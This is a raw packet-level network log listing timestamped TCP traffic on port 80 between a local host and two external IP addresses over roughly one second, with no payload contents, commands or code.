Apr 26, 2024 23:09:00.652476072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652518034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652570963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652651072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652692080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652693033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652760983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652780056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652806044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652856112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652903080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652909994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.652947903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.652991056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.776063919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:00.776124954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:00.915730000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917438030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917484999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917503119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917521954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917558908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917579889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917617083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917629004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917651892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917714119 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917726040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917733908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917740107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917776108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917794943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917812109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917824984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917850971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.917871952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.917896986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918024063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918080091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918106079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918152094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918183088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918195009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918215990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918220997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918240070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918260098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918277979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918302059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918334007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918342113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918365955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918369055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918380976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918415070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918451071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918454885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918489933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918492079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918505907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918540955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918553114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918576956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918589115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918610096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918638945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918646097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918658972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918680906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918693066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918703079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918704987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918735027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918778896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918792009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918803930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918826103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918844938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918857098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.918904066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918941975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.918947935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919024944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919078112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919097900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919167995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919215918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919239998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919277906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919357061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919398069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919420958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919467926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919487000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919523001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919553995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919595003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919637918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919651031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919672012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919680119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919723034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919728994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919744015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919765949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919791937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919826984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919850111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919862986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919874907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919892073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919920921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.919924021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919949055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919974089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.919994116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920020103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920037985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920061111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920062065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920120001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920126915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920141935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920170069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920207024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920219898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920239925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920278072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920320034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920413017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920459032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920471907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920481920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:00.920506954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:00.920546055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.184583902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.184619904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.184726954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.184794903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.184901953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.184983015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185050011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185389042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185543060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185715914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185785055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185844898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185890913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.185954094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186041117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186202049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186458111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186573982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186642885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186696053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186784983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186858892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186923981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.186985016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187045097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187096119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187184095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187242031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187328100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187422991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187489986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187578917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187669039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187741995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187815905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187869072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.187962055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188097000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188400030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188477993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188564062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188627005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188716888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188767910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188841105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.188922882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189007998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189080000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189169884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189529896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189593077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189661980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.189704895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190079927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190176010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190218925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190251112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190304041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190371990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190412998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190428019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190465927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190479994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190687895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190758944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190800905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190826893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190867901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.190886021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.190967083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191098928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191137075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.191266060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191359997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.191509008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191576004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191632986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191667080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.191842079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.191915989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192004919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192065954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192117929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192131042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192172050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192249060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192384958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192434072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192477942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192516088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192560911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192610025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192653894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192687988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192727089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192801952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192874908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192938089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.192955017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.192997932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193068981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193069935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.193381071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193422079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.193484068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193599939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193634987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.193715096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193780899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.193820000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.193950891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194005966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194046021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.194062948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194111109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194180012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194222927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.194226027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194266081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.194608927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194794893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.194834948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.194917917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.195044994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.195082903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.195257902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.195378065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.195460081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.195482016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196054935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196110964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.196141005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196185112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.196211100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196250916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.196337938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196382999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.196408033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.196532965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197026014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197069883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197350025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197429895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197470903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197527885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197570086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197572947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197613955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197639942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197674990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197700024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197741985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197772980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197812080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.197953939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.197997093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198122978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198165894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198247910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198306084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198329926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198371887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198398113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198462963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198502064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198544025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198599100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198645115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198676109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198719025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198734999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198777914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.198944092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.198997021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199042082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199083090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199124098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199135065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199187040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199206114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199289083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199291945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199326992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199425936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199467897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199472904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199527025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.199898005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.199960947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200026989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200035095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200082064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200114965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200155973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200186968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200248957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:01.200318098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:01.200365067 CEST	80	49734	176.97.76.106	192.168.2.4
